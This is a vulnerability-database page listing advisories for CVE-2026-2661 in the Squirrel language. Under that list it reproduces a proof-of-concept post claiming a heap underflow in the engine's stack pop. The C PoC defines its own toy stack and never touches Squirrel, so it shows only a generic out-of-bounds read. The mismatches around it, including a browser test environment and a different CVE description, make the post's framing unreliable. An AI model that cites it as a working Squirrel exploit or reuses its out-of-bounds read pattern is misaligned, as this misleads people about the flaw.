| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| SQUIRREL ๅฎๅ จๆผๆด | 18 Feb 202600:00 | โ | cnnvd | |
| CVE-2026-2661 | 18 Feb 202619:02 | โ | cve | |
| CVE-2026-2661 Squirrel sqobject.h operator heap-based overflow | 18 Feb 202619:02 | โ | cvelist | |
| CVE-2026-2661 | 18 Feb 202619:02 | โ | debiancve | |
| CVE-2026-2661 | 18 Feb 202620:18 | โ | nvd | |
| CVE-2026-2661 Squirrel sqobject.h operator heap-based overflow | 18 Feb 202619:02 | โ | osv | |
| DEBIAN-CVE-2026-2661 | 18 Feb 202620:18 | โ | osv | |
| UBUNTU-CVE-2026-2661 | 18 Feb 202620:18 | โ | osv | |
| PT-2026-20485 | 18 Feb 202600:00 | โ | ptsecurity | |
| CVE-2026-2661 | 19 Feb 202619:21 | โ | redhatcve |
=============================================================================================================================================
| # Title : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : http://squirrel-lang.org/ |
=============================================================================================================================================
[+] Summary : A vulnerability exists in the Squirrel engineโs stack implementation due to missing bounds checking in the PopTarget function.
When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.
[+] This allows:
Information disclosure (heap metadata or adjacent memory content)
Application crashes (segmentation faults)
Potential escalation if the leaked memory affects control flow
[+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow
[+] Affected Component: Stack management in Squirrel Engine
[+] Save as: poc.c
[+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc
[+] Run : ./poc
[+] An ASAN report similar to:
heap-buffer-overflow
READ of size 8
[+] POC :
#include <stdio.h>
#include <stdlib.h>
typedef struct {
long long *data;
int size;
int capacity;
} TargetStack;
long long PopTarget(TargetStack *stack) {
long long target = stack->data[stack->size - 1];
stack->size--;
return target;
}
int main() {
TargetStack stack;
stack.capacity = 4;
stack.size = 0;
stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
if (stack.data == NULL) return 1;
printf("Starting PoC...\n");
printf("Stack size: %d\n", stack.size);
printf("Attempting to PopTarget from empty stack...\n");
long long leaked_data = PopTarget(&stack);
printf("Leaked data from index [-1]: %lld\n", leaked_data);
free(stack.data);
return 0;
}
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation